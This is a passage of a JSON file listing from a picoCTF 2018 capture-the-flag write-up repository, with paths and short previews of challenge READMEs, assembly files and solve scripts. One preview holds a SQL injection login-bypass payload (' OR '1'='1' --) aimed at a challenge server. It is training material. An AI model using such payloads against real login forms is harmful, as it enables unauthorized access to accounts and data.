"chars": 803,
"preview": "#!/usr/bin/python\nfrom pwn import *\nimport re\n\nl = log.progress('Status')\ns = remote('2018shell1.picoctf.com', 5731)\n\nl."
},
{
"path": "General Skills/script me/README.md",
"chars": 417,
"preview": "# script me\nPoints: 500\n\n## Category\nGeneral Skills\n\n## Question\n>Can you understand the language and answer the questio"
},
{
"path": "General Skills/script me/solution/solve.py",
"chars": 1686,
"preview": "#!/usr/bin/python\n# Author: plusline (https://github.com/plusline)\n# Modified by: PlatyPew\n\nimport re\nfrom pwn import *\n"
},
{
"path": "General Skills/ssh-keyz/README.md",
"chars": 1350,
"preview": "# ssh-keyz\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>As nice as it is to use our webshell, sometimes its hel"
},
{
"path": "General Skills/store/README.md",
"chars": 585,
"preview": "# store\nPoints: 400\n\n## Category\nGeneral Skills\n\n## Question\n>We started a little [store](files/store), can you buy the "
},
{
"path": "General Skills/store/files/source.c",
"chars": 2517,
"preview": "#include <stdio.h>\n#include <stdlib.h>\nint main()\n{\n int con;\n con = 0;\n int account_balance = 1100;\n while("
},
{
"path": "General Skills/strings/README.md",
"chars": 571,
"preview": "# strings\nPoints: 100\n\n## Category\nGeneral Skills\n\n## Question\n>Can you find the flag in this [file]() without actually "
},
{
"path": "General Skills/what base is this?/README.md",
"chars": 713,
"preview": "# what base is this?\nPoints: 200\n\n## Category\nGeneral Skills\n\n## Question\n>To be successful on your mission, you must be"
},
{
"path": "General Skills/what base is this?/solution/solve.py",
"chars": 627,
"preview": "#!/usr/bin/python\n\nfrom pwn import *\nimport re\n\ns = remote('2018shell1.picoctf.com', 1225)\n\nbinary = s.recvuntil('word.'"
},
{
"path": "General Skills/you can't see me/README.md",
"chars": 800,
"preview": "# you can't see me\nPoints: 200\n\n## Category\nGeneral Skills\n\n## Question\n>'...reading transmission... Y.O.U. .C.A.N.'.T. "
},
{
"path": "README.md",
"chars": 22673,
"preview": "# picoCTF 2018 Writeup\nThis CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](https://github.com/"
},
{
"path": "Reversing/Radix's Terminal/README.md",
"chars": 812,
"preview": "# Radix's Terminal \nPoints: 400\n\n## Category\nReversing\n\n## Question\n>Can you find the password to Radix's login? You can"
},
{
"path": "Reversing/Reversing Warmup 1/README.md",
"chars": 553,
"preview": "# Reversing Warmup 1\nPoints: 50\n\n## Category\nReversing\n\n## Question\n>Throughout your journey you will have to run many p"
},
{
"path": "Reversing/Reversing Warmup 2/README.md",
"chars": 439,
"preview": "# Reversing Warmup 2\nPoints: 50\n\n## Category\nReversing\n\n## Question\n>Can you decode the following string `dGg0dF93NHNfcz"
},
{
"path": "Reversing/assembly-0/README.md",
"chars": 947,
"preview": "# assembly-0\nPoints: 150\n\n## Category\nReversing\n\n## Question\n>What does asm0(0xc9,0xb0) return? Submit the flag as a hex"
},
{
"path": "Reversing/assembly-0/files/intro_asm_rev.S",
"chars": 176,
"preview": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm0\n\nasm0:\n\tpush\tebp\n\tmov\tebp,esp\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tmov\tebx,DWORD"
},
{
"path": "Reversing/assembly-1/README.md",
"chars": 559,
"preview": "# assembly-1\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>What does asm1(0x76) return? Submit the flag as a hexadeci"
},
{
"path": "Reversing/assembly-1/files/eq_asm_rev.S",
"chars": 549,
"preview": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm1\n\nasm1:\n\tpush\tebp\n\tmov\tebp,esp\n\tcmp\tDWORD PTR [ebp+0x8],0x98\n\tjg \tpart_a\t\n"
},
{
"path": "Reversing/assembly-2/README.md",
"chars": 2481,
"preview": "# assembly-2\nPoints: 250\n\n## Category\nReversing\n\n## Question\n>What does asm2(0x7,0x28) return? Submit the flag as a hexa"
},
{
"path": "Reversing/assembly-2/files/loop_asm_rev.S",
"chars": 436,
"preview": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm2\n\nasm2:\n\tpush \tebp\n\tmov \tebp,esp\n\tsub \tesp,0x10\n\tmov \teax,DWORD"
},
{
"path": "Reversing/assembly-2/solution/Makefile",
"chars": 131,
"preview": "all:\n\tgcc -m32 -c loop.s -o loop.o\n\tgcc -m32 -c solve.c -o solve.o\n\tgcc -m32 -o a.out solve.o loop.o\n\t./a.out\nclean:\n\trm"
},
{
"path": "Reversing/assembly-2/solution/loop.s",
"chars": 427,
"preview": ".intel_syntax noprefix\n\t\n.global asm2\n\nasm2:\n\tpush \tebp\n\tmov \tebp,esp\n\tsub \tesp,0x10\n\tmov \teax,DWORD PTR [ebp"
},
{
"path": "Reversing/assembly-2/solution/solve.c",
"chars": 80,
"preview": "#include <stdio.h>\n\nint main() {\n printf(\"Flag: 0x%x\\n\", asm2(0x7, 0x28));\n}\n"
},
{
"path": "Reversing/assembly-2/solution/solve.sh",
"chars": 19,
"preview": "#!/bin/sh\nmake all\n"
},
{
"path": "Reversing/assembly-3/README.md",
"chars": 1961,
"preview": "# assembly-3\nPoints: 400\n\n## Category\nReversing\n\n## Question\n>What does asm3(0xbda42100,0xb98dd6a5,0xecded223) return? S"
},
{
"path": "Reversing/assembly-3/files/end_asm_rev.S",
"chars": 259,
"preview": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm3\n\nasm3:\n\tpush \tebp\n\tmov \tebp,esp\n\tmov\teax,0xbc\n\txor\tal,al\n\tmov\tah,BYT"
},
{
"path": "Reversing/assembly-3/solution/Makefile",
"chars": 128,
"preview": "all:\n\tgcc -m32 -c end.s -o end.o\n\tgcc -m32 -c solve.c -o solve.o\n\tgcc -m32 -o a.out solve.o end.o\n\t./a.out\nclean:\n\trm a."
},
{
"path": "Reversing/assembly-3/solution/end.s",
"chars": 250,
"preview": ".intel_syntax noprefix\n\t\n.global asm3\n\nasm3:\n\tpush \tebp\n\tmov \tebp,esp\n\tmov\teax,0xbc\n\txor\tal,al\n\tmov\tah,BYTE PTR [eb"
},
{
"path": "Reversing/assembly-3/solution/solve.c",
"chars": 105,
"preview": "#include <stdio.h>\n\nint main() {\n printf(\"Flag: 0x%x\\n\", asm3(0xbda42100, 0xb98dd6a5, 0xecded223));\n}\n"
},
{
"path": "Reversing/assembly-3/solution/solve.sh",
"chars": 19,
"preview": "#!/bin/sh\nmake all\n"
},
{
"path": "Reversing/assembly-4/README.md",
"chars": 639,
"preview": "# assembly-4\nPoints: 550\n\n## Category\nReversing\n\n## Question\n>Can you find the flag using the following assembly [source"
},
{
"path": "Reversing/assembly-4/files/Makefile",
"chars": 80,
"preview": "all:\n\tnasm -f elf32 comp.nasm\n\tgcc -m32 comp.o\n\t./a.out\nclean:\n\trm a.out comp.o\n"
},
{
"path": "Reversing/assembly-4/files/comp.nasm",
"chars": 19724,
"preview": "\n\n\n\n\n\n\nglobal rrf0\nglobal rrf1\nglobal rrf2\nglobal rrf3\nglobal rrf4\nglobal rrf5\nglobal rrf6\nglobal rrf7\nglobal rrf8\ngloba"
},
{
"path": "Reversing/assembly-4/solution/Makefile",
"chars": 80,
"preview": "all:\n\tnasm -f elf32 comp.nasm\n\tgcc -m32 comp.o\n\t./a.out\nclean:\n\trm a.out comp.o\n"
},
{
"path": "Reversing/assembly-4/solution/comp.nasm",
"chars": 19724,
"preview": "\n\n\n\n\n\n\nglobal rrf0\nglobal rrf1\nglobal rrf2\nglobal rrf3\nglobal rrf4\nglobal rrf5\nglobal rrf6\nglobal rrf7\nglobal rrf8\ngloba"
},
{
"path": "Reversing/assembly-4/solution/solve.sh",
"chars": 14,
"preview": "make all\necho\n"
},
{
"path": "Reversing/be-quick-or-be-dead-1/README.md",
"chars": 2059,
"preview": "# be-quick-or-be-dead-1\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>You [find](https://www.youtube.com/watch?v=CTt1"
},
{
"path": "Reversing/be-quick-or-be-dead-2/README.md",
"chars": 5102,
"preview": "# be-quick-or-be-dead-2\nPoints: 275\n\n## Category\nReversing\n\n## Question\n>As you enjoy this [music](https://www.youtube.c"
},
{
"path": "Reversing/be-quick-or-be-dead-2/solution/calculate.py",
"chars": 303,
"preview": "n = 1083\n\ndef fib(n):\n i = 0\n nextterm = 1\n present = 1\n previous = 0\n\n while i < n:\n nextterm = p"
},
{
"path": "Reversing/be-quick-or-be-dead-3/README.md",
"chars": 526,
"preview": "# be-quick-or-be-dead-3\nPoints: 350\n\n## Category\nReversing\n\n## Question\n>As the [song](https://www.youtube.com/watch?v=C"
},
{
"path": "Reversing/be-quick-or-be-dead-3/solution/solve.py",
"chars": 164,
"preview": "def calc(n):\n\tif n <= 4:\n\t\tx = n * n + 0x2345\n\telse:\n\t\tx = calc(n - 5) * 0x1234 + (calc(n - 1) - calc(n - 2) - calc(n - "
},
{
"path": "Reversing/keygen-me-1/README.md",
"chars": 265,
"preview": "# keygen-me-1\nPoints: 400\n\n## Category\nReversing\n\n## Question\n>Can you generate a valid product key for the validation ["
},
{
"path": "Reversing/keygen-me-1/solution/test.c",
"chars": 1216,
"preview": "/*\nint validate_key(int arg0) {\n var_4 = arg0;\n esp = (esp - 0x10) + 0x10;\n var_C = strlen(var_4);\n var_14 ="
},
{
"path": "Reversing/quackme/README.md",
"chars": 8729,
"preview": "# quackme\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>Can you deal with the Duck Web? Get us the flag from this [pr"
},
{
"path": "Reversing/quackme/solution/solve.py",
"chars": 289,
"preview": "#!/usr/bin/python\n\ninitialMsg = \"You have now entered the Duck Web, and you're in for a honkin' good time.\"\nxorData = '2"
},
{
"path": "Reversing/quackme up/README.md",
"chars": 316,
"preview": "# quackme up\nPoints: 350\n\n## Category\nReversing\n\n## Question\n>The duck puns continue. Can you crack, I mean quack this ["
},
{
"path": "Reversing/special-pw/README.md",
"chars": 403,
"preview": "# special-pw\nPoints: 600\n\n## Category\nReversing\n\n## Question\n>Can you figure out the right argument to this program to l"
},
{
"path": "Reversing/special-pw/files/special_pw.S",
"chars": 2328,
"preview": ".intel_syntax noprefix\n.bits 32\n\t\n.global main\t; int main(int argc, char **argv)\n\nmain:\n\tpush ebp\n\tmov ebp,esp\n\tsub"
},
{
"path": "Web Exploitation/A Simple Question/README.md",
"chars": 1827,
"preview": "# A Simple Question\nPoints: 650\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018she"
},
{
"path": "Web Exploitation/A Simple Question/solution/solve.py",
"chars": 717,
"preview": "#!/usr/bin/python\nimport requests\nimport re\n\ndef brute():\n\tfinal = ''\n\twhile True:\n\t\tfor i in range(0x20, 0x7f):\n\t\t\tif i"
},
{
"path": "Web Exploitation/A Simple Question/solution/source/answer2.phps",
"chars": 624,
"preview": "<?php\n include \"config.php\";\n ini_set('error_reporting', E_ALL);\n ini_set('display_errors', 'On');\n\n $answer = $_POS"
},
{
"path": "Web Exploitation/A Simple Question/solution/source/index.html",
"chars": 1433,
"preview": "<!doctype html>\n<html>\n<head>\n <title>Question</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.boot"
},
{
"path": "Web Exploitation/Artisinal Handcrafted HTTP 3/README.md",
"chars": 3824,
"preview": "# Artisinal Handcrafted HTTP 3\nPoints: 300\n\n## Category\nWeb Exploitation\n\n## Question\n>We found a hidden flag server hid"
},
{
"path": "Web Exploitation/Artisinal Handcrafted HTTP 3/solution/solve.py",
"chars": 531,
"preview": "#!/usr/bin/python\n\nfrom pwn import *\nimport time\nimport re\n\ns = remote('2018shell1.picoctf.com', 42496)\n\ntime.sleep(1)\np"
},
{
"path": "Web Exploitation/Buttons/README.md",
"chars": 606,
"preview": "# Buttons\nPoints: 250\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoct"
},
{
"path": "Web Exploitation/Buttons/solution/solve.py",
"chars": 180,
"preview": "#!/usr/bin/python\n\nimport requests\nimport re\n\nr = requests.post('http://2018shell1.picoctf.com:21579/button2.php')\nsourc"
},
{
"path": "Web Exploitation/Buttons/solution/source/boo.html",
"chars": 906,
"preview": "<!doctype html>\n<html>\n<head>\n <title>Buttons!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.boot"
},
{
"path": "Web Exploitation/Buttons/solution/source/button1.php",
"chars": 287,
"preview": "<!doctype html>\n<html>\n<head>\n <title>Buttons!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.boot"
},
{
"path": "Web Exploitation/Buttons/solution/source/index.html",
"chars": 767,
"preview": "<!doctype html>\n<html>\n<head>\n <title>Buttons!</title>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.boot"
},
{
"path": "Web Exploitation/Client Side is Still Bad/README.md",
"chars": 1092,
"preview": "# Client Side is Still Bad\nPoints: 150\n\n## Category\nWeb Exploitation\n\n## Question\n>I forgot my password again, but this "
},
{
"path": "Web Exploitation/Client Side is Still Bad/solution/source/index.html",
"chars": 1464,
"preview": "<html>\n<head>\n<title>Super Secure Log In</title>\n</head>\n<body bgcolor=\"#000000\">\n<!-- standard MD5 implementation -->\n<"
},
{
"path": "Web Exploitation/Flaskcards/README.md",
"chars": 2991,
"preview": "# Flaskcards\nPoints: 350\n\n## Category\nWeb Exploitation\n\n## Question\n>We found this fishy [website](http://2018shell1.pic"
},
{
"path": "Web Exploitation/Flaskcards Skeleton Key/README.md",
"chars": 435,
"preview": "# Flaskcards Skeleton Key\nPoints: 600\n\n## Category\nWeb Exploitation\n\n## Question\n>Nice! You found out they were sending "
},
{
"path": "Web Exploitation/Help Me Reset 2/README.md",
"chars": 897,
"preview": "# Help Me Reset 2\nPoints: 600\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell"
},
{
"path": "Web Exploitation/Inspect Me/README.md",
"chars": 489,
"preview": "# Inspect Me\nPoints: 125\n\n## Category\nWeb Exploitation\n\n## Question\n>Inpect this code! http://2018shell1.picoctf.com:532"
},
{
"path": "Web Exploitation/Inspect Me/solution/source/index.html",
"chars": 1011,
"preview": "<!doctype html>\n<html>\n <head>\n <title>My First Website :)</title>\n <link href=\"https://fonts.googleapis.com/css?"
},
{
"path": "Web Exploitation/Inspect Me/solution/source/mycss.css",
"chars": 741,
"preview": "div.container {\n width: 100%;\n}\n\nheader {\n background-color: #c9d8ef;\n padding: 1em;\n color: white;\n clea"
},
{
"path": "Web Exploitation/Inspect Me/solution/source/myjs.js",
"chars": 646,
"preview": "function openTab(tabName,elmnt,color) {\n var i, tabcontent, tablinks;\n tabcontent = document.getElementsByClassNam"
},
{
"path": "Web Exploitation/Irish Name Repo/README.md",
"chars": 1075,
"preview": "# Irish Name Repo\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell"
},
{
"path": "Web Exploitation/Irish Name Repo/solution/solve.py",
"chars": 260,
"preview": "#!/usr/bin/python\n\nimport requests\nimport re\n\nparams = {'username': \"' OR '1'='1' --\", 'password': '', 'debug': 0}\n\nr = "
}
]
// ... and 76 more files (download for full content)
About this extraction
This page contains the full source code of the PlatyPew/picoctf-2018-writeup GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 276 files (302.3 KB), approximately 113.2k tokens, and a symbol index with 101 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.